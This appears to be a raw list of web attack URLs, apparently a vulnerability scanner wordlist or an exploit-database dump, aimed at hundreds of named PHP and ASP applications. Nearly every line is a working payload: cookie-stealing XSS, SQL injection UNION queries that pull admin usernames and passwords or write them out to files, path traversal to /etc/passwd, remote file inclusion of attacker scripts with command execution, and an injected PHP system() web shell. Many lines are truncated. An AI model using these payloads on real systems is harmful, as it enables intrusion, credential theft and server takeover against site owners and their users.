/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http
/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript
/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http
/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http
/vb/member.php?u=[XSS]
/calendar.php?display=event&id=[SQL]
/report.php?postid=[SQL]
/showmods.php?boardid=[SQL]
/mybb/usercp.php?action=do_options??;showcodebuttons=1?,additionalgroups=’4
/featured_photos.php?browse=1[SQL]
/products.php?cid=1[SQL]
/index.php?cid=1&#039;[SQL]
/news_desc.php?id=1[SQL]
/picture.php?pid=1[SQL]
/mem.php?mid=1[SQL]
/search.php?search=3&sex=1[SQL]
/webmaster/index.php?login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&pswd=test
/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http
/user_view.php?u=<iframe%20src=http
/gallery/thumb.php?image=data/path.jpg">''>">">"><SCRIPT%20SRC=http
/[patch_aplication]/adodb/tests/tmssql.php?do=<script>alert(document.cookie);</script>
//http
/include/listall.inc.php?mysqlcall=[file] 
/show/index.php?prefix=[file] 
/conad/include/rootGui.inc.php?header=[file] 
/conad/include/mysqlCall.inc.php?config=[file] 
/conad/changeEmail.inc.php?mysqlCall=[file] 
/conad/changeUserDetails.inc.php?mysqlCall=[file] 
/conad/checkPasswd.inc.php?mysqlCall=[file] 
/conad/login.inc.php?mysqlCall=[file] 
/conad/logout.inc.php?mysqlCall=[file]
/[MyMail_path]/admin/login.php=error=[XSS]
/index.php?group=<script src=http
/activatemember?activatecode=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
/openguestbook/header.php?title=</title>[XSS]
/openguestbook/view.php?offset=[SQL]
/recipe/cookbook.php?crisoftricette=http
/[scriptpath]/admin/admin.php?page=[code]
/[scriptpath]/admin/admin.php?page=[code]
/gbrowse.php?cat_id=[SQL] 
/rating.php?card_id=[SQL]
/create.php?card_id=[SQL]
/search.php?event_id=[SQL]
/emall/products.php?cid=[XSS]
/emall/detail.php?prodid=[XSS]
/search.php?rate=[sql]
/phpicalendar/rss/index.php?cal=[XSS]
/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3E&where=1
/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
/index.php?cat_id=&#039;%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
/index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
/index.php?tim=%22%3E%3Cscript%3Ealert(&#039;Ellipsis%20Security%20Test&#039;)%3C/script%3E
/index.php?id=%3Cimg%20src=javascript
/?words=&#039;[SQL]
/?words=%27[SQL]&where=1
/index.php?id=&#039;[SQL]
/index.php?topmenuitem=&#039;[SQL]
/index.php?cat_id=&#039;[SQL]
/index.php?words=&#039;[SQL]&where=1
/inc/rss_feed.php?category=&#039;[SQL]&amount=10
/sitebuilder/admin/top.php?admindir=[evil_script] http
/path to joke script/category.php?id=-99%20union%20select%20name,name,name,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*
/divers.php?action=commentaires&commentaires=&id=1&disabled=%3C/textarea%3E%3Cscript%3Ealert(8)%3C/script%3E http
/(path)/index.php?_PX_config[manager_path]=http
/(path)/rss.php?_PX_config[manager_path]=http
/(path)/search.php?_PX_config[manager_path]=http
//evilcode.txt?
//evilcode.txt?
//evilcode.txt?
//evilcode.txt?
//evilcode.txt?
//evilcode.txt?
//evilcode.txt?
/phpwebgallery/comments.php?keyword=%22%3E[XSS]
/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E
/randshop/index.php?incl=http
/index.php/"><script>alert(document.cookie)<\script>/script>/?[arguments] http
/index.php?act=ketqua&code=showcat&idcat=[SQL] 
/index.php?act=Attach&type=post&id=[SQL] 
/index.php?act=Profile&CODE=[SQL] 
/index.php?act=ketqua&code=[SQL] 
/coins_list.php?member_id=[SQL] 
/index.php?act=Login&CODE=[SQL] 
/index.php?act=Help&CODE=[SQL] 
/index.php?act=ref&id=[SQL]
/photo/thumb.php?gallery=./Corvette&image=[EVIL_SCRIPT]
/admin/create_course.php?show_courses=[code]&current_cat=[code]
/users/create_course.php?show_courses=[code]
/documentation/admin/?p=2.0.configuration.php">[code]
/password_reminder.php?forgot=Email+Reminder">[code]
/users/browse.php?cat=[code]
/admin/fix_content.php?submit=Submit">[code]
/extcalendar.php?mosConfig_absolute_path=[attacker]
/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script>
/forum/index.php?fid=-1[SQL]
/path/stats.php?root_path=code]
/components/com_forum/download.php?phpbb_root_path=[attacker]
/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
/topics.php?f=-1 union all select version()--
/topics.php?f=-1 union ll select database()--
/topics.php?f=-1 union all select user()--
/story/add.php?forumid=[SQL Injection]
/camera/%3Cscript%3Ealert('www.eazel.es')%3C/script%3E ]
 <script>alert("XSS")</script> when you load the page http
/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS] 
/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script> 
/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS] 
/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>
/photocycle.php?phpage=<script%20src=http
/path_to_cl_files/calendar.php?path_to_calendar=http
/[path_to_flatnuke]/index.php?mod=Gallery
/fm.php?GLOBAL[template]=LFI
/index.php?showtopic=[XSS]
/index.php?showtopic=[SQL]
/[path]/user-func.php?myadmindir=[Shell]
/mail/settings.html?id=[current_id]&Save_x=1&language=TEST http
/[path]/enduser/listmessenger.php?lm_path=evil_script?
/[target]/[path]/components/com_articles.php?absolute_path=http
/index.php?page=http
/order/index.php?page=http
/GeoAuctionsEnterprise/index.php?a=1030&b=~ID_NUMBER~&d=[SQL]
/GeoAuctions/index.php?a=2&b=[SQL]
/[target]/news.php?absolute_path=[shellcode]?
/[path_advanced_poll]/admin/common.inc.php?base_path=http
/[path]/setup/upgrader.php?RootDirectory=http
/[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http
/linkscaffe/links.php?cat=1&offset=[SQL]
/linkscaffe/links.php?cat=1&limit=[SQL] 
/linkscaffe/links.php?action=new&newdays=[SQL] 
/linkscaffe/links.php?action=deadlink&link_id=[SQL] 
/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/* 
/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
/linkscaffe/links.php?action=new&newdays=[XSS]
/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
/linkscaffe/menu.inc.php?textcolor='%3E[XSS]
/linkscaffe/menu.inc.php?bodycolor='%3E[XSS] 
/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTe st/)</script>
/viewfeedback.php?view=1'[SQL] 
/viewfeedback.php?view=all&start=1'[SQL]
/categories.php?parent=&start=&orderField=itemname&orderType =1'[SQL]
/[path]/calendar.php?week="><script>alert(&#039;test!&#039;)</script><
/phpbb/auction_room.php?ar=[num][sql]
/phpbb/auction_room.php?order=price_asc&ar=[num][sql]
/phpbb/auction_store.php?mode=store&u=[num][sql]
/calendar/payment.php?insPath=[evil_script]
/usercp.php?action=avatar&gallery=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
/usercp.php?action=avatar&gallery=../../uploads
/usercp.php?action=do_avatar&gallery=../../../../../../..dir&avatar=myfile
/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTest/)</script>&d=5
/admin/index.php?b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]=1
/[path]/modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script>< 
/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1 
/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1 
/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=&lt;/textarea&gt;<script>alert('XSS Vulnerability')%3B</script>
/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/ 
/admin.php?activatebanner&id=-1%20[SQLi] 
/admin.php?activateuser&id='+[SQL] 
/admin.php?deleteunuser&id='+[SQL] 
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
/admin.php?viewmem&viewmem='+[SQL] 
/admin.php?viewmemunb&viewmemunb='+[SQL] 
/admin.php?viewunmem&viewunmem='+[SQL] 
/admin.php?deletebanner&id=-1+[SQL] 
/admin.php?activateuser&deleteuser='+[SQL] 
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/members.php?cfg_root=http
/index.php?m=&#039;
/index.php?m=member&id=&#039;
/myevent.php?myevent_path=http
/module.php?module=osTicket&file=../../../../../../../../../etc/passwd
/header.php?siteName=<XSS>&title=<XSS>&style=<XSS>
/search.php?query=<XSS>
/[wow_roster_path]/hsList.php?subdir=http
/[path]/quickie.php?QUICK_PATH=evilcode.txt?&cmd=id
/[path]/index.php?faq_path=evilcode.txt?&cmd=id
/[scriptpath]/index.php?GB_PATH=evilcode.txt?&cmd=id
/error.php?err=200&uname=victim&email=attacker@example.com
/index.php?show=archives&y=2006&m=<script%20src=http
/index.php?show=archives&c=http
/[Path]/war.php?page=[SQL] & [XSS]
/vwar/war.php?s=[SQL]
/vwar/war.php?page=[SQL]or[xss]
/vwar/war.php?showgame=[SQL]
/vwar/war.php?sortby=[sql]
/vwar/war.php?sortorder=[sql]
/vwar/calendar.php?year=[xss]
/forum/mods/glo%62al.php?_tmp[csscolors]=a
/[phpsimpleshop_path]/admin/index.php?abs_path=http
/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls
/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
//www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=http
/[path]/guestbook.php?id=4 
/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201 
/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201 
/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201 
/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201
/profile.php?action=avatar_gallery&id={your registered user ID here}/category=../../general/
/[myBloggie]/index.php?mybloggie_root_path=http
/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]
/index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>
/[path]/examples/image.php?image=http
/[miniBloggie]/cls_fast_template.php?fname=attacker's site
/install/install3.php?database=none&cabsolute_path=[script]
/wp-admin/edit.php?page=wp-db-backup.php&backup=../../../../../etc/passwd
/autohtml.php?op=modload&name=../../../../etc/passwd
/[target]/[lizge_path]//index.php?lizge=http
/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http
/[mambo_path]/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/[target]/[path_to_cubecart]/admin/filemanager/preview.php?file="><script>alert(document.cookie)</script>
/[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&x="><script>alert(document.cookie)</script>
/[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&y="><script>alert(document.cookie)</script>
/[target]/[path_to_cubecart]/admin/login.php?email="><script>alert(document.cookie)</script>
/dir_blogccms/index.php?DIR_PLUGINS=http
/mtg_homepage.php?mosConfig_absolute_path=http
/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt? http
/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell http
/[Script Path]/jobseekers/forgot.php?uname=[XSS]&fu=Submit 
/[Script Path]/jobseekers/forgot.php?SEmail=[XSS]&fm=Submit
/[Script Path]/index.php?read=[XSS]
/frontend/x/htaccess/dohtaccess.html?dir=[code]
/frontend/x/files/editit.html?dir=/&file=[code]
/frontend/x/files/showfile.html?dir=/&file=[code]
/com_estateagent/estateagent.php?mosConfig_absolute_path=shell
/path/tcms_administer_site=SHELL
/[Path]/cm_lib.inc.php?path_pre=http
/[Path]/doc/br.edithelp.php?path_pre=http
/[Path]/userrating.php?path_pre=http
/[Path]/listing.php?path_pre=http
/[Script Path]/clients/index.php?src=http
/[Script Path]/site/getad.php?refid=&email=default&ps=[XSS]
/[Path]/index.php?root_path==http
/HPE/lang/de.php?HPEinc=http
/HPE/lang/fr.php?HPEinc=http
/HPE/clickerr.php3?HPEinc=http
/HPE/loadcatnews.php3?HPEinc=http
/HPE/motd.php3?HPEinc=http
/HPE/plugins/mod.news.php3?HPEinc=http
/HPE/plugins/mod.newslog.php3?HPEinc=http
/HPE/plugins/news.htmlnews.php3?HPEinc=http
/HPE/plugins/news.xmlbi.php3?HPEinc=http
/HPE/plugins/news.xmlphp.php3?HPEinc=http
/HPE/plugins/news.xmlphp.php3?HPEinc=http
/HPE/plugins/page.dmoz.show.php3?HPEinc=http
/HPE/thememaker.php3?HPEinc=http
/HPE/plugins/mod.news.php3?HPEinc=http
/HPE/plugins/news.htmlnews.php3?HPEinc=http
/HPE/plugins/news.xmlbi.php3?HPEinc=http
/HPE/plugins/news.xmlphp.php3?HPEinc=http
/HPE/plugins/page.dmoz.show.php3?HPEinc=http
/HPE/plugins/page.newnews.show.php3?HPEinc=http
/HPE/plugins/page.randnews.show.php3?HPEinc=http
/HPE/plugins/page.teaser.show.php3?HPEinc=http
/HPE/plugins/mod.news.php3?HPEinc=http
/HPE/plugins/news.htmlnews.php3?HPEinc=http
/HPE/plugins/news.xmlbi.php3?HPEinc=http
/HPE/plugins/news.xmlphp.php3?HPEinc=http
/HPE/plugins/page.dmoz.show.php3?HPEinc=http
/HPE/thememaker.php3?HPEinc=http
/[PATH]/template/default/thanks_comment.php?D_REFRESH_URL=[XSS]
/path/index.php?template=[Evil Code]
/path/includes/phpdig/libs/search_function.php?relative_script_path=[Evil Code]
/[Bigace]/system/admin/include/item_main.php?GLOBALS=[Evil Script]
/[Bigace]/system/admin/include/upload_form.php?GLOBALS=[Evil Script]
/[Bigace]/system/command/download.cmd.php?GLOBALS=[Evil Script]
/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]
/[Script Path]/ajax/myajaxphp.php?config[BASE_DIR]=http
/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http
/hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
/[mbcms]/admin/avatar.php?_SERVER=http
/comments.php?id=[SQL Query]
/[path_to_linksCaffe]/Admin/admin1953.php
/[Script Path]/payment/payment_result.php?config[template_path]=http
/function_post.php?[url]java& 115;cript
/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E 
/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc http
/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps
/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps
/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps
/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps
/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps
/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps
/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps
/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps
/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps
/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps
/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #
/loginreq2.php?subgroupname="><script>alert(666)</script>
/learncenter.asp?id="><script>alert(1);</script>
/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http
/articles/article.php?context[path_to_root]=attacker's site
/articles/populate.php?context[path_to_root]=attacker's site
/categories/category.php?context[path_to_root]=attacker's site
/categories/populate.php?context[path_to_root]=attacker's site
/comments/populate.php?context[path_to_root]=attacker's site
/files/file.php?context[path_to_root]=attacker's site
/sections/section.php?context[path_to_root]=attacker's site
/sections/populate.php?context[path_to_root]=attacker's site
/tables/populate.php?context[path_to_root]=attacker's site
/users/user.php?context[path_to_root]=attacker's site
/users/populate.php?context[path_to_root]=attacker's site
/[path]/index.php?UserID=http
/[path]/setup/inc/database.php?tcms_administer_site=Sh3ll
/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http
/aut_verifica.inc.php?user='+[SQL]&pass=something
/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all[code]&eid=2474
/index.php?page=<script>alert('hacking%20xss')</script>
/[path]/consult/joueurs.php?id_joueur=-1'%20UNION%20SELECT%20pseudo,2,3,mot_de_passe,5,mail,7,8,9%20%20FROM%20phpl_membres%20WHERE%20id%20='1
/modules/BookCatalog/upload.php Upload c99 or r57 shell scripts http
/help.php?act=[XSS] 
/report.php?p=[XSS]
/topic.php?t=1&s=-1[Query]
/textads/clients/delete.php?id=[xss]
/textads/clients/error.php?error[xss]
/PHProg/?id=1&album=http
/PHProg/index.php?lang=http
/index.php?errcode=<script>alert(document.cookie);</script>
/PHProg/?id=1&album=<script>alert('input')</script>
/PHProg/index.php?lang=../../../../../../BOOT.INI%00
/isupport/support/rightbar.php?suser=[xss]
/isupport/support/open_tickets.php?ticket_id=[xss]
/isupport/index.php?cons_page_title=[xss]
/isupport/index.php?cons_root=[shell]
/newscript/print/print.php?ide=../../../../etc/passwd%00
/[Script Path]/childwindow.inc.php?form=http
/[Script]/index.php?dir_path=[U r Evil Script] ;
/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ;
/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ;
/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ;
/[Script]/help.php?dir_path=[U r Evil Script] ;
/[Script]/smile.php?dir_path=[U r Evil Script] ;
/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ;
/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ;
/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;
/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ;
/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ;
/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ;
/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ;
/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ;
/[Script]/entry.php?dir_path=[U r Evil Script] ;
/[Script]/admin/preview.php?dir_path=[U r Evil Script] ;
/[Script]/admin/log.php?dir_path=[U r Evil Script] ;
/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
/[Script]/admin/config.php?dir_path=[U r Evil Script] ;
/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;
//Www.example.Com/[Script]/haut.php?nb_connecte=http
/index.php?errcode=<script>alert(document.cookie);</script>
/contact.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/download.php/"><script>alert('founded by pointGLow.com -zark0vac')</script>
/e107_admin/admin.php/%22%3E%3C/script%3E%3Cscript%3Ealert('founded bypointGLow.com - zark0vac')%3C/script%3E
/fpw.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/news.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/search.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/signup.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/submitnews.php/"><script>alert('founded by pointGLow.com -zark0vac')</script>
/user.php/"><script>alert('founded by pointGLow.com - zark0vac')</script>
/directory_where_you_installed_php_event_calendar/cl_files/index.php Vulnerable fields
/links.php? c=999'% 20union%20select% 201,222
/out.php? l=999' union select 1,1,'http
/1.0 200 OK%0D%0A%0D% 0A.......
/admin/e_data/visEdit_control.class.php?visEdit_root=http
/admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><"
/admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>
/admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"
/admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>
/admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>
/admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>
/[path]/addfav.php?PP_PATH=[Attack Shell]?
/[path]/adm-admlog.php?PP_PATH=[Attack Shell]?
/[path]/adm-approve.php?PP_PATH=[Attack Shell]?
/[path]/adm-backup.php?PP_PATH=[Attack Shell]?
/[path]/adm-cats.php?PP_PATH=[Attack Shell]?
/[path]/adm-cinc.php?PP_PATH=[Attack Shell]?
/[path]/adm-db.php?PP_PATH=[Attack Shell]?
/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]?
/[path]/adm-inc.php?PP_PATH=[Attack Shell]?
/[path]/adm-index.php?PP_PATH=[Attack Shell]?
/[path]/adm-modcom.php?PP_PATH=[Attack Shell]?
/[path]/adm-move.php?PP_PATH=[Attack Shell]?
/[path]/adm-options.php?PP_PATH=[Attack Shell]?
/[path]/adm-order.php?PP_PATH=[Attack Shell]?
/[path]//adm-pa.php?PP_PATH=[Attack Shell]?
/[path]/adm-photo.php?PP_PATH=[Attack Shell]?
/[path]/adm-purge.php?PP_PATH=[Attack Shell]?
/[path]/adm-style.php?PP_PATH=[Attack Shell]?
/[path]/adm-templ.php?PP_PATH=[Attack Shell]?
/[path]/adm-userg.php?PP_PATH=[Attack Shell]?
/[path]/adm-users.php?PP_PATH=[Attack Shell]?
/[path]/bulkupload.php?PP_PATH=[Attack Shell]?
/[path]/cookies.php?PP_PATH=[Attack Shell]?
/[path]/comments.php?PP_PATH=[Attack Shell]?
/[path]/ecard.php?PP_PATH=[Attack Shell]?
/[path]/editphoto.php?PP_PATH=[Attack Shell]?
/[path]/register.php?PP_PATH=[Attack Shell]?
/[path]/showgallery.php?PP_PATH=[Attack Shell]?
/[path]/showmembers.php?PP_PATH=[Attack Shell]?
/[path]/useralbums.php?PP_PATH=[Attack Shell]?
/[path]/uploadphoto.php?PP_PATH=[Attack Shell]?
/[path]/search.php?PP_PATH=[Attack Shell]?
/[path]/adm-menu.php?PP_PATH=[Attack Shell]?
/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>
/[path]/index.php?main=category&sub=product&CatId=[xss]
/[path]/index.php?SearchOpt=1&main=search&sub=index&SearchWd=[xss]
/modules/galleryuploadfunction.php picture path will be gallery/albums/public/name.ext
/modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script> 
/modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script> 
/modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script> 
/modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>
/modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script> 
/modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script> 
/modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>
/modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script> 
/modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script> 
/modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script> 
/modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script> 
/modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>
/modules/register&a=3&d=3&key='%20or%20id=1/* 
//localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http
/[path]/index.php?REP_CLASS=[shell]
/[path]/arbo.php?REP_CLASS=[shell]
/[path]/framepoint.php?REP_CLASS=[shell]
/[path]/genpage.php?REP_CLASS=[shell]
/[path]/lienvalider.php?REP_CLASS=[shell]
/[path]/appreciation.php?REP_CLASS=[shell]
/[path]/partenariat.php?REP_CLASS=[shell]
/[path]/rechercher.php?REP_CLASS=[shell]
/[path]/projet.php?REP_CLASS=[shell]
/[path]/propoexample.php?REP_CLASS=[shell]
/[path]/refererpoint.php?REP_CLASS=[shell]
/[path]/top50.php?REP_CLASS=[shell]
/pm.php?s=o&replyuser="><script>alert(document.cookie);</script><"
/[scriptpath]/index.php?id=y0urscripts.txt?&cmd=id
/inc/generic_error.php?message=[xss]
/inc/generic_error.php?message=1&code=[xss]
/NixieAffiliate/forms/lostpassword.php?error=[xss]
/ptnews-1.7.8/search.php?pgname=[xss]
/[path]/index.php?content=[xss]
/[path]/search.php?what=[xss]&search_top.x=0&search_top.y=0&search_top=GO
/Path/imgen.php?root=http
/Path/admin/config.php?root_path=http
/Path/common.php?root_path=http
/Path/admin/index.php?root_path=htpp
/livre_dor/choix_langue.php?choix_lng=../../../../../../../BOOT.ini%00
/adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(document.cookie);</script> 
/adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(document.cookie);</script>
/adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>alert(document.cookie);</script> 
/adminpanel/includes/mailinglist/sendemail.php?message_text=&lt;/textarea&gt;<script>alert(document.cookie);</script>
/adminpanel/includes/header.php?the_band=</title><script>alert(document.cookie);</script>
/adminpanel/login_header.php?the_band=</title><script>alert(document.cookie);</script>
/includes/content/bio_content.php?the_band=<Script>alert(document.cookie);</script>
/includes/content/gbook_content.php?the_band=<script>alert(document.cookie);</script> 
/includes/content/interview_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/links_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/lyrics_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/member_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/merch_content.php?the_band=<script>alert(document.cookie);</script> 
/includes/content/mp3_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/news_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/pastshows_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/photo_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/releases_content.php?the_band=<script>alert(document.cookie);</script> 
/includes/content/reviews_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/shows_content.php?the_band=<script>alert(document.cookie);</script>
/includes/content/signgbook_content.php?the_band=<script>alert(document.cookie);</script>
/includes/footer.php?this_year=<script>alert(document.cookie);</script>
/js/vendors.php?file=../../../../[file]%00foobar.js
/js/vendors.php?file=../../../../[file]%00foobar.js
/$page?sq_remote_page_action=fetch_url&sq_remote_page_url=http
/[path]/index.php?includesdir=http
/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd
/media.php?album=../../../../../../../../../../../../..&key=/etc/passwd
/[path]/details.php?gid=[xss]
/[path]/view_photog.php?photogid=[xss]
/[path]/index.php?view=Login&destination=[xss]
/[path]/comment.php?entryid=<Script>
/[path]/index.php?page=<Script>
/[path]/user.php?uid=<Script>
/[path]/index.php?page=<Script>
/[path]/admin.php?do=<Script>
/[path]/common.php?lan=attacker's site
/[Path]/Facts.php?includes_path=attacker's_file
/[Path]/search.php?includes_path=attacker's_file
/[path]/[path]/mybic_server.php?file=attacker's site
/[path]/admin/user_user.php?language=attacker's_site
/[path]/admin/news.php?language=attacker's_site
/[path]/admin/catagory.php?language=attacker's_site
/[path]/creat_news_all.php?language=attacker's_site
/[path]/acc.php?page=attacker's_file
/[path]/index.php?mod=http
/[path]/index.php?action=http
/[path]/modules/pageedit/index.php?pageid=http
/global.php?templatesused=nn,dd,'))/* 
/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
